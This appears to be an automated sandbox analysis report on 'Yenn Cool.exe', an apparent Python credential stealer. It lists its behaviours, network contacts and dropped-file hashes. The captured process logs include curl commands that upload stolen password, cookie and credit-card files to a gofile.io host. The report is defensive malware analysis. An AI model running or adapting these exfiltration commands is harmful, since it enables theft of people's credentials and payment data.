Analysis Overview
SHA256
7050faa77423879af7a746ec4868ca467b26bcbc690c1f240a86ab5a8b01a591
Threat Level: Shows suspicious behavior
The file Yenn Cool.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Drops startup file
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Browser Information Discovery
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
cURL User-Agent
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-12 18:14
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:18
Platform
win11-20241007-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:17
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
112s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe | C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Browser Information Discovery
Suspicious use of WriteProcessMemory
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
C:\Windows\system32\curl.exe
curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:49921 | tcp | |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| N/A | 127.0.0.1:49935 | tcp | |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| N/A | 127.0.0.1:49939 | tcp | |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| FR | 20.199.58.43:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI47682\python311.dll
| MD5 | 58e01abc9c9b5c885635180ed104fe95 |
| SHA1 | 1c2f7216b125539d63bd111a7aba615c69deb8ba |
| SHA256 | de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837 |
| SHA512 | cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\base_library.zip
| MD5 | 1df66a5a8d8c7bc333ed59a827e131e3 |
| SHA1 | 614986f57b9922cedf4df5ebadaa10ea307d46d1 |
| SHA256 | 190afb1aa885c2aa3516ab343e35f6b10472f4314492c8c4492c7d0f2add2f80 |
| SHA512 | 6568af0d41b1d2f1d4a75e25705777ec263c4a903db164923f4a10118218270a2b003f16f39ae238fe71f0dc1ad52d0cc1ac93a7bf2c6643d009f825dd00e1aa |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_ctypes.pyd
| MD5 | 6114277c6fc040f68d25ca90e25924cd |
| SHA1 | 028179c77cb3ba29cd8494049421eaa4900ccd0e |
| SHA256 | f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656 |
| SHA512 | 76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_lzma.pyd
| MD5 | 737119a80303ef4eccaa998d500e7640 |
| SHA1 | 328c67c6c4d297ac13da725bf24467d8b5e982e3 |
| SHA256 | 7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28 |
| SHA512 | 1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_socket.pyd
| MD5 | 64a6c475f59e5c57b3f4dd935f429f09 |
| SHA1 | ca2e0719dc32f22163ae0e7b53b2caadb0b9d023 |
| SHA256 | d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49 |
| SHA512 | cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\select.pyd
| MD5 | 653bdccb7af2aa9ccf50cb050fd3be64 |
| SHA1 | afe0a85425ae911694c250ab4cb1f6c3d3f2cc69 |
| SHA256 | e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279 |
| SHA512 | 07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_bz2.pyd
| MD5 | 4438affaaa0ca1df5b9b1cdaa0115ec1 |
| SHA1 | 4eda79eaf3de614d5f744aa9eea5bfcf66e2d386 |
| SHA256 | ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85 |
| SHA512 | 6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_queue.pyd
| MD5 | 8bbed19359892f8c95c802c6ad7598e9 |
| SHA1 | 773fca164965241f63170e7a1f3a8fa17f73ea18 |
| SHA256 | 4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065 |
| SHA512 | 22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_ssl.pyd
| MD5 | a0b40f1f8fc6656c5637eacacf7021f6 |
| SHA1 | 38813e25ffde1eee0b8154fa34af635186a243c1 |
| SHA256 | 79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1 |
| SHA512 | c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\libcrypto-3.dll
| MD5 | 7a6a8c2a8c379b111cdceb66b18d687d |
| SHA1 | f3b8a4c731fa0145f224112f91f046fddf642794 |
| SHA256 | 8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b |
| SHA512 | f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\libssl-3.dll
| MD5 | 64acb046fe68d64ee475e19f67253a3c |
| SHA1 | d9e66c9437ce6f775189d6fdbd171635193ec4cc |
| SHA256 | b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10 |
| SHA512 | f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_overlapped.pyd
| MD5 | ac053ef737e4f13b02bfa81f9e46170b |
| SHA1 | 5d8ebeb30671b74d736731696fedc78c89da0e1f |
| SHA256 | cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f |
| SHA512 | 6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\pyexpat.pyd
| MD5 | cdcf0e74a32ad7dfeda859a0ce4fcb20 |
| SHA1 | c72b42a59ba5d83e8d481c6f05b917871b415f25 |
| SHA256 | 91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197 |
| SHA512 | c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_brotli.cp311-win_amd64.pyd
| MD5 | d9fc15caf72e5d7f9a09b675e309f71d |
| SHA1 | cd2b2465c04c713bc58d1c5de5f8a2e13f900234 |
| SHA256 | 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf |
| SHA512 | 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_hashlib.pyd
| MD5 | 1524882af71247adecf5815a4e55366a |
| SHA1 | e25014c793c53503bdff9af046140edda329d01b |
| SHA256 | 6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327 |
| SHA512 | 5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\unicodedata.pyd
| MD5 | 1905b5d0f945499441e8cd58eb123d86 |
| SHA1 | 117e584e6fcc0e8cfc8e24e3af527999f14bac30 |
| SHA256 | b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532 |
| SHA512 | ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\certifi\cacert.pem
| MD5 | 78d9dd608305a97773574d1c0fb10b61 |
| SHA1 | 9e177f31a3622ad71c3d403422c9a980e563fe32 |
| SHA256 | 794d039ffdf277c047e26f2c7d58f81a5865d8a0eb7024a0fac1164fea4d27cf |
| SHA512 | 0c2d08747712ed227b4992f6f8f3cc21168627a79e81c6e860ee2b5f711af7f4387d3b71b390aa70a13661fc82806cc77af8ab1e8a8df82ad15e29e05fa911bf |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
| MD5 | 6cdca2fde9df198da58955397033af98 |
| SHA1 | e457c97721504d25f43b549d57e4538a62623168 |
| SHA256 | a4a758eabd1b2b45f3c4699bdfebc98f196dc691c0a3d5407e17fffffafc5df7 |
| SHA512 | 7b3c384ba9993d3192ed852191ff77bdcd3421cbc69ff636c6deb8fe7248e066573b68d80a8f280ae0c1cb015f79967d46d910455d932eaeac072c76d0757e92 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\charset_normalizer\md.cp311-win_amd64.pyd
| MD5 | 28af0ffb49cc20fe5af9fe8efa49d6f1 |
| SHA1 | 2c17057c33382ddffea3ca589018cba04c4e49d7 |
| SHA256 | f1e26ef5d12c58d652b0b5437c355a14cd66606b2fbc00339497dd00243081e0 |
| SHA512 | 9aa99e17f20a5dd485ae43ac85842bd5270ebab83a49e896975a8fa9f98ffc5f7585bef84ed46ba55f40a25e224f2640e85cebe5acb9087cf46d178ecc8029f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_asyncio.pyd
| MD5 | 511a52bcb0bd19eda7aa980f96723c93 |
| SHA1 | b11ab01053b76ebb60ab31049f551e5229e68ddd |
| SHA256 | d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394 |
| SHA512 | d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_sqlite3.pyd
| MD5 | a7df575bf69570944b004dfe150e8caf |
| SHA1 | 2fd19be98a07347d59afd78c167601479aac94bb |
| SHA256 | b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b |
| SHA512 | 18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\sqlite3.dll
| MD5 | b49b8fde59ee4e8178c4d02404d06ee7 |
| SHA1 | 1816fc83155d01351e191d583c68e722928cce40 |
| SHA256 | 1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f |
| SHA512 | a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\_cffi_backend.cp311-win_amd64.pyd
| MD5 | fde9a1d6590026a13e81712cd2f23522 |
| SHA1 | ca99a48caea0dbaccf4485afd959581f014277ed |
| SHA256 | 16eccc4baf6cf4ab72acd53c72a1f2b04d952e07e385e9050a933e78074a7d5b |
| SHA512 | a522661f5c3eeea89a39df8bbb4d23e6428c337aac1d231d32b39005ea8810fce26af18454586e0e94e51ea4ac0e034c88652c1c09b1ed588aeac461766981f4 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Cipher\_raw_ecb.pyd
| MD5 | dedae3efda452bab95f69cae7aebb409 |
| SHA1 | 520f3d02693d7013ea60d51a605212efed9ca46b |
| SHA256 | 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a |
| SHA512 | 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Cipher\_raw_cbc.pyd
| MD5 | 0c46d7b7cd00b3d474417de5d6229c41 |
| SHA1 | 825bdb1ea8bbfe7de69487b76abb36196b5fdac0 |
| SHA256 | 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1 |
| SHA512 | d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Cipher\_raw_ofb.pyd
| MD5 | a13584f663393f382c6d8d5c0023bc80 |
| SHA1 | d324d5fbd7a5dba27aa9b0bdb5c2aebff17b55b1 |
| SHA256 | 13c34a25d10c42c6a12d214b2d027e5dc4ae7253b83f21fd70a091fedac1e049 |
| SHA512 | 14e4a6f2959bd68f441aa02a4e374740b1657ab1308783a34d588717f637611724bc90a73c80fc6b47bc48dafb15cf2399dc7020515848f51072f29e4a8b4451 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Util\_strxor.pyd
| MD5 | fae081b2c91072288c1c8bf66ad1aba5 |
| SHA1 | cd23ddb83057d5b056ca2b3ab49c8a51538247de |
| SHA256 | af76a5b10678f477069add6e0428e48461fb634d9f35fb518f9f6a10415e12d6 |
| SHA512 | 0adb0b1088cb6c8f089cb9bf7aec9eeeb1717cf6cf44b61fb0b053761fa70201ab3f7a6461aaae1bc438d689e4f8b33375d31b78f1972aa5a4bf86afad66d3a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Hash\_SHA1.pyd
| MD5 | 9d15862569e033c5aa702f9e4041c928 |
| SHA1 | 11376e8cb76ad2d9a7d48d11f4a74fb12b78bcf6 |
| SHA256 | 8970df77d2f73350360dbe68f937e0523689ff3d7c0be95eb7ca5820701f1493 |
| SHA512 | 322f0f4947c9d5d2800deebfd198eabe730d44209c1b61bb9fd0f7f9ed5f719ae49f8397f7920bdb368bb386a598e9b215502dc46fbe72f9340876cf40affc8a |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Hash\_BLAKE2s.pyd
| MD5 | 06d3e941860bb0abedf1baf1385d9445 |
| SHA1 | e8c16c3e8956ba99a2d0de860dcfc5021f1d7de5 |
| SHA256 | 1c340d2625dad4f07b88bb04a81d5002aabf429561c92399b0eb8f6a72432325 |
| SHA512 | 6f62acff39b77c1ec9f161a9bfa94f8e3b932d56e63daee0093c041543993b13422e12e29c8231d88bc85c0573ad9077c56aa7f7a307e27f269da17fba8ee5a3 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Cipher\_raw_ctr.pyd
| MD5 | a34f499ee5f1b69fc4fed692a5afd3d6 |
| SHA1 | 6a37a35d4f5f772dab18e1c2a51be756df16319a |
| SHA256 | 4f74bcf6cc81bac37ea24cb1ef0b17f26b23edb77f605531857eaa7b07d6c8b2 |
| SHA512 | 301f7c31dee8ff65bb11196f255122e47f3f1b6b592c86b6ec51ab7d9ac8926fecfbe274679ad4f383199378e47482b2db707e09d73692bee5e4ec79c244e3a8 |
C:\Users\Admin\AppData\Local\Temp\_MEI47682\Crypto\Cipher\_raw_cfb.pyd
| MD5 | 3142c93a6d9393f071ab489478e16b86 |
| SHA1 | 4fe99c817ed3bcc7708a6631f100862ebda2b33d |
| SHA256 | 5ea310e0f85316c8981ed6293086a952fa91a6d12ca3f8af9581521ee2b15586 |
| SHA512 | dcafec54bd9f9f42042e6fa4ac5ed53feb6cf8d56ada6a1787cafc3736aa72f14912bbd1b27d0af87e79a6d406b0326602ecd1ad394acdc6275aed4c41cdb9ef |
C:\Users\Admin\AppData\Local\Tempcsikvkwvrk.db
| MD5 | 4c17a4ccd88d89b3a7962f8f69d9b572 |
| SHA1 | 66c52475f686d0d996464cb0c57e17c047dc1e88 |
| SHA256 | b990ecf33dca931c79a5102562aa4fba15b7a99fb11486ace8dbd0e23e9d6807 |
| SHA512 | 07143c9553d865da50438cf0da4d6d14ea83e9eee58f1e9cfdf42e46e428536ffe48c06d6bbe0fec7503cae34181da87301bc5bc623652c06f9581680c74df38 |
C:\Users\Admin\AppData\Local\Tempcsubrcoqbn.db
| MD5 | 780853cddeaee8de70f28a4b255a600b |
| SHA1 | ad7a5da33f7ad12946153c497e990720b09005ed |
| SHA256 | 1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3 |
| SHA512 | e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-12 18:14
Reported
2024-11-12 18:17
Platform
win11-20241007-en
Max time kernel
93s
Max time network
126s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe | C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Browser Information Discovery
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
C:\Windows\system32\curl.exe
